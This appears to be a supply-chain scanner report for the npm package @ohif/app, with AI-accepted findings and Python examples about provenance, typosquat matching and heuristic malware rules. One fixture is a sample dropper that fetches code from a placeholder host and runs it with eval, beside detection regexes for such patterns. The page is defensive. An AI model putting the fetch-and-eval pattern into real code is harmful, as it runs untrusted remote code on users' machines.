@ohif/app
OHIF Viewer
Supply chain provenance
Status for the latest visible version.
Without npm provenance (a Sigstore-signed SLSA attestation emitted by the publishing CI job) there is no cryptographic link between this tarball and the public source repository: the registry's own signature only proves that the registry served these bytes, not that they were built from the published source. The axios compromise (March 2026) relied on exactly this gap.
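To see the difference between "registry-signed" and "has provenance" in the metadata the registry actually returns, here is an added example (not the scanner's code and not anything from the OHIF project). `PACKUMENT` is a constructed excerpt in the shape of an npm registry response for a made-up `example-pkg`; the `dist.signatures` and `dist.attestations` field names follow npm's published provenance format, but every hash, key id and URL is a placeholder.

```python
"""Report which versions in a packument carry a Sigstore/SLSA provenance attestation.

Added example; PACKUMENT below is constructed, not real registry data.
"""
import json

# Predicate types npm currently emits for provenance attestations.
SLSA_PREDICATE_TYPES = frozenset({
    "https://slsa.dev/provenance/v0.2",
    "https://slsa.dev/provenance/v1",
})

# Constructed packument excerpt: 1.0.0 is only registry-signed, 1.1.0 also
# carries a provenance attestation. Values are placeholders.
PACKUMENT = json.loads('''{
  "name": "example-pkg",
  "dist-tags": {"latest": "1.1.0"},
  "versions": {
    "1.0.0": {
      "dist": {
        "tarball": "https://registry.example.invalid/example-pkg/-/example-pkg-1.0.0.tgz",
        "integrity": "sha512-PLACEHOLDER",
        "signatures": [{"keyid": "SHA256:placeholder-registry-key", "sig": "MEUCIQ..."}]
      }
    },
    "1.1.0": {
      "dist": {
        "tarball": "https://registry.example.invalid/example-pkg/-/example-pkg-1.1.0.tgz",
        "integrity": "sha512-PLACEHOLDER",
        "signatures": [{"keyid": "SHA256:placeholder-registry-key", "sig": "MEUCIQ..."}],
        "attestations": {
          "url": "https://registry.example.invalid/-/npm/v1/attestations/example-pkg@1.1.0",
          "provenance": {"predicateType": "https://slsa.dev/provenance/v1"}
        }
      }
    }
  }
}''')


def provenance_status(version_meta: dict) -> dict:
    """Classify one version entry from a packument.

    registry_signed: the registry signed the integrity hash (true for almost
    every package; says nothing about where the tarball was built).
    has_provenance: a SLSA provenance attestation is attached (the build-to-
    source link the page is talking about).
    """
    dist = version_meta.get("dist") or {}
    attestations = dist.get("attestations") or {}
    predicate = (attestations.get("provenance") or {}).get("predicateType")
    return {
        "registry_signed": bool(dist.get("signatures")),
        "has_provenance": predicate in SLSA_PREDICATE_TYPES,
        "predicate_type": predicate,
        "attestation_url": attestations.get("url"),
    }


def report(packument: dict) -> dict:
    """Status for every version in the packument, keyed by version string."""
    return {v: provenance_status(m) for v, m in packument.get("versions", {}).items()}


def latest_has_provenance(packument: dict) -> bool:
    """True only if the dist-tag 'latest' version carries a provenance attestation."""
    latest = packument["dist-tags"]["latest"]
    return provenance_status(packument["versions"][latest])["has_provenance"]


if __name__ == "__main__":
    for version, status in report(PACKUMENT).items():
        print(version, status)
```

Against a live registry the same check is `npm view <pkg>@<version> dist.attestations`, and `npm audit signatures` goes one step further by verifying both the registry signature and the attestation against the Sigstore transparency log. The presence of `dist.signatures` on its own is not a provenance signal: the registry signs essentially every tarball it serves, so a version like the constructed `1.0.0` above is "signed" yet still has no link back to source.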
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| phantom-deps | phantom-dep:@ohif/extension-default | AI (phantom-deps): Same-org OHIF extension; loaded by app configuration convention. | ai | |
| source-diff | obfuscated-file:dist/5858.bundle.466e58128de344ab53f3.js | AI (source-diff): CharLS WASM codec bundle; minified Emscripten output is expected for WASM modules. | ai | |
| source-diff | obfuscated-file:dist/6376.bundle.527820a5cb1eece2a8d2.js | AI (source-diff): Standard webpack bundle; minification is expected for OHIF dist bundles. | ai | |
| source-diff | obfuscated-file:dist/7431.bundle.b31ebb4a2625e89d864e.js | AI (source-diff): Standard webpack bundle; minification is expected for OHIF dist bundles. | ai | |
| source-diff | obfuscated-file:dist/8665.bundle.dc56c125411422f9f686.js | AI (source-diff): Standard webpack bundle; minification is expected for OHIF dist bundles. | ai | |
| source-diff | net-exec-file:dist/2108.bundle.aea8d3b39486dd5ab39e.js | AI (source-diff): DICOM SUV scaling factors bundle; network+exec pattern is webpack module loading, not malware. | ai | |
| source-diff | net-exec-file:dist/5858.bundle.466e58128de344ab53f3.js | AI (source-diff): CharLS WASM codec; Emscripten runtime legitimately uses fetch/XHR for WASM binary loading. | ai | |
| source-diff | net-exec-file:dist/6347.bundle.f8393c20d5159ed41b64.js | AI (source-diff): Cornerstone adapters bundle; network+exec is webpack module loading pattern. | ai | |
| source-diff | net-exec-file:dist/6354.bundle.d8a592b03e9a5b7a66c2.js | AI (source-diff): Standard OHIF webpack bundle; network+exec is webpack module loading pattern. | ai | |
| source-diff | net-exec-file:dist/7431.bundle.b31ebb4a2625e89d864e.js | AI (source-diff): Standard OHIF webpack bundle; network+exec is webpack module loading pattern. | ai | |
| source-diff | net-exec-file:dist/8665.bundle.dc56c125411422f9f686.js | AI (source-diff): Standard OHIF webpack bundle; network+exec is webpack module loading pattern. | ai | |
| phantom-deps | phantom-dep:core-js | AI (phantom-deps): Known implicit polyfill dependency for OHIF; loaded by convention. | ai | |
| phantom-deps | phantom-dep:react-dom | AI (phantom-deps): Peer dependency loaded by convention in OHIF ecosystem. | ai | |
| phantom-deps | phantom-dep:@ohif/extension-cornerstone | AI (phantom-deps): Same-org OHIF extension; loaded by app configuration convention. | ai | |
| source-diff | obfuscated-file:dist/2516.bundle.f62228e9a800de8d4b31.js | AI (source-diff): Standard webpack bundle for itk-wasm morphological contour interpolation; minification is expected. | ai | |
| source-diff | obfuscated-file:dist/3081.bundle.930757b1a5aa8549e112.js | AI (source-diff): Standard webpack bundle for OHIF cornerstone hooks; minification is expected. | ai | |
| source-diff | obfuscated-file:dist/5462.bundle.d5bb9b3ddc510fea141f.js | AI (source-diff): Standard webpack bundle for cornerstone tools; minification is expected. | ai | |
| source-diff | obfuscated-file:dist/5830.bundle.791019deddd536980a11.js | AI (source-diff): Standard webpack bundle for itk-wasm; minification is expected. | ai | |
| typosquat | typosquat.levenshtein:pg | AI (typosquat): Scoped package @ohif/app; Levenshtein match to 'pg' is a false positive. | ai | |
| typosquat | typosquat.levenshtein:yup | AI (typosquat): Scoped package @ohif/app; Levenshtein match to 'yup' is a false positive. | ai | |
| typosquat | typosquat.levenshtein:ajv | AI (typosquat): Scoped package @ohif/app; Levenshtein match to 'ajv' is a false positive. | ai | |
| phantom-deps | phantom-dep:react | AI (phantom-deps): Webpack app; react is referenced in config/build files, not directly imported in source. | ai | |
| phantom-deps | phantom-dep:dcmjs | AI (phantom-deps): Config-referenced dep in a webpack-based DICOM viewer; stable false positive. | ai | |
| phantom-deps | phantom-dep:@ohif/core | AI (phantom-deps): Same-org scoped dep; phantom-dep heuristic unreliable for monorepo packages. | ai | |
| phantom-deps | phantom-dep:@ohif/ui | AI (phantom-deps): Same-org scoped dep; phantom-dep heuristic unreliable for monorepo packages. | ai | |
| phantom-deps | phantom-dep:@ohif/i18n | AI (phantom-deps): Same-org scoped dep; phantom-dep heuristic unreliable for monorepo packages. | ai | |
| phantom-deps | phantom-dep:@ohif/ui-next | AI (phantom-deps): Same-org scoped dep; phantom-dep heuristic unreliable for monorepo packages. | ai | |
| phantom-deps | phantom-dep:oidc-client | AI (phantom-deps): Config-referenced dep; stable false positive for this webpack app. | ai | |
| phantom-deps | phantom-dep:dicom-parser | AI (phantom-deps): Config-referenced dep; stable false positive for this DICOM viewer. | ai | |
| provenance | no-provenance | AI (provenance): Established package with 811 versions; lack of provenance is common and not a risk signal here. | ai | |
| typosquat | typosquat.levenshtein:hapi | AI (typosquat): Scoped package @ohif/app; Levenshtein match to 'hapi' is a false positive. | ai | |
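The four typosquat rows above all come from the same mechanism: the rule strips the scope, compares the bare name `app` against a list of popular package names, and `app` sits at edit distance 2 from `pg`, `yup`, `ajv` and `hapi`. The added example below (not the scanner's code; `POPULAR_NAMES` is a constructed stand-in for whatever list the real rule consults) reproduces the misfire and shows the two changes that remove it: never compare a scoped package against unscoped popular names, since `@ohif/app` cannot be reached by mistyping `pg`, and use a length-normalised distance so that two edits in a three-letter name do not count as "similar".

```python
"""Levenshtein typosquat check: the naive form that misfires on short scoped
names, and a tighter form. Added example; POPULAR_NAMES is constructed."""

POPULAR_NAMES = ("pg", "yup", "ajv", "hapi", "react", "express", "lodash")


def levenshtein(a: str, b: str) -> int:
    """Edit distance via the classic two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(
                prev[j] + 1,                 # delete ca
                cur[j - 1] + 1,              # insert cb
                prev[j - 1] + (ca != cb),    # substitute (free if equal)
            ))
        prev = cur
    return prev[-1]


def bare_name(pkg: str) -> str:
    """'@ohif/app' -> 'app'; unscoped names are returned unchanged."""
    if pkg.startswith("@") and "/" in pkg:
        return pkg.split("/", 1)[1]
    return pkg


def naive_matches(pkg: str, popular=POPULAR_NAMES, max_distance: int = 2) -> list:
    """The misfiring rule: bare name, absolute distance threshold."""
    name = bare_name(pkg)
    return sorted(p for p in popular if p != name and levenshtein(name, p) <= max_distance)


def similarity_matches(pkg: str, popular=POPULAR_NAMES, max_ratio: float = 0.25) -> list:
    """Tighter rule: skip scoped packages entirely (a scope cannot be typed by
    accident when installing an unscoped name) and require the edit distance
    to be a small fraction of the longer name, not a fixed count."""
    if pkg.startswith("@"):
        return []
    return sorted(
        p for p in popular
        if p != pkg and levenshtein(pkg, p) / max(len(pkg), len(p)) <= max_ratio
    )


if __name__ == "__main__":
    print("naive:", naive_matches("@ohif/app"))        # the four accepted rows
    print("tight:", similarity_matches("@ohif/app"))   # nothing
    print("tight:", similarity_matches("reakt"))       # a real squat still fires
```

The normalised rule still catches the cases the check exists for (`reakt` against `react`, `expres` against `express`) while producing nothing for `@ohif/app`, so the four rows above would never have needed an accepted-risk entry.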
v3.12.2

3 findings:

- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v3.12.1

15 findings (one per file):

- 8 × Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- 6 × Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
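The two source-diff rules behind the findings for v3.12.1 and v3.12.2 are simple enough to reproduce, and reproducing them makes the accepted-risk reasoning concrete: a webpack chunk with a content hash in its name is one long minified line, and an Emscripten/WASM loader legitimately pairs `fetch()` with `new Function()`, so it trips both rules exactly as a dropper would. The added example below (not the scanner's code) implements the two checks over a constructed set of "newly added" files: a stand-in webpack WASM chunk, a plain minified vendor file, a short two-line dropper, and a clean module. The path pattern for webpack chunk names is the `dist/<id>.bundle.<hash>.js` shape visible in the table above, and the network/exec regexes are my own assumptions about what the real rule looks for.

```python
"""Reproduce the 'obfuscated-file' and 'net-exec-file' heuristics over a
constructed set of added files. Added example; ADDED_FILES is constructed."""
import re

MAX_LINE_CHARS = 3000

# Assumed pattern for a webpack chunk with a content hash (dist/5858.bundle.<20 hex>.js).
WEBPACK_CHUNK = re.compile(r"^dist/\d+\.bundle\.[0-9a-f]{20}\.js$")

# Assumed signal lists; the real rule's lists are not on the page.
NETWORK_CALL = re.compile(
    r"\b(?:fetch|XMLHttpRequest|WebSocket|importScripts|navigator\.sendBeacon)\s*\("
    r"|\bhttps?\.(?:request|get)\s*\("
)
DYNAMIC_EXEC = re.compile(
    r"\beval\s*\(|\bnew\s+Function\s*\(|\bFunction\s*\("
    r"|\bvm\.(?:runInNewContext|runInThisContext|compileFunction)\s*\("
)


def longest_line(text: str) -> int:
    return max((len(line) for line in text.splitlines()), default=0)


def scan_file(path: str, text: str) -> list:
    """Return the rule ids that fire for one added file, in rule order."""
    rules = []
    if longest_line(text) > MAX_LINE_CHARS:
        rules.append("obfuscated-file")
    if NETWORK_CALL.search(text) and DYNAMIC_EXEC.search(text):
        rules.append("net-exec-file")
    return rules


def scan_added_files(added: dict) -> dict:
    """Map each flagged path to its rules plus a triage hint: whether the name
    matches webpack's chunk naming. The hint is context for a reviewer, not a
    suppression; an attacker can name a dropper the same way."""
    report = {}
    for path, text in added.items():
        rules = scan_file(path, text)
        if rules:
            report[path] = {"rules": rules, "webpack_chunk_name": bool(WEBPACK_CHUNK.match(path))}
    return report


# Constructed inputs. The hash in the chunk name is a placeholder.
WASM_CHUNK = (
    '(self.webpackChunk=self.webpackChunk||[]).push([[5858],{5858:function(e,t,n){'
    'var r=fetch(n.p+"codec.wasm").then(function(e){return e.arrayBuffer()});'
    'var s=new Function("Module","return Module");'
    "/*" + "x" * 3100 + "*/}}]);"
)
MINIFIED_VENDOR = "!function(){" + "var a=1;" * 500 + "}();"
DROPPER = (
    "const u = 'https://cdn.example.invalid/u.js';\n"
    "fetch(u).then(r => r.text()).then(code => eval(code));\n"
)
CLEAN = "export const version = '1.0.0';\nexport function add(a, b) { return a + b; }\n"

ADDED_FILES = {
    "dist/5858.bundle.0123456789abcdef0123.js": WASM_CHUNK,
    "dist/vendor.min.js": MINIFIED_VENDOR,
    "lib/update.js": DROPPER,
    "src/index.js": CLEAN,
}


if __name__ == "__main__":
    for path, result in scan_added_files(ADDED_FILES).items():
        print(path, result)
```

The output is the same pair of rules for the WASM chunk and for the two-line dropper; only the second is interesting, and nothing in the file itself separates them. That is why the accepted-risk entries above reason from build context ("Emscripten output", "webpack module loading") rather than from file content, and why the stronger check is the provenance one: rebuild the package from the tagged source and diff the `dist/` output, or require a provenance attestation so the registry has already done that link for you.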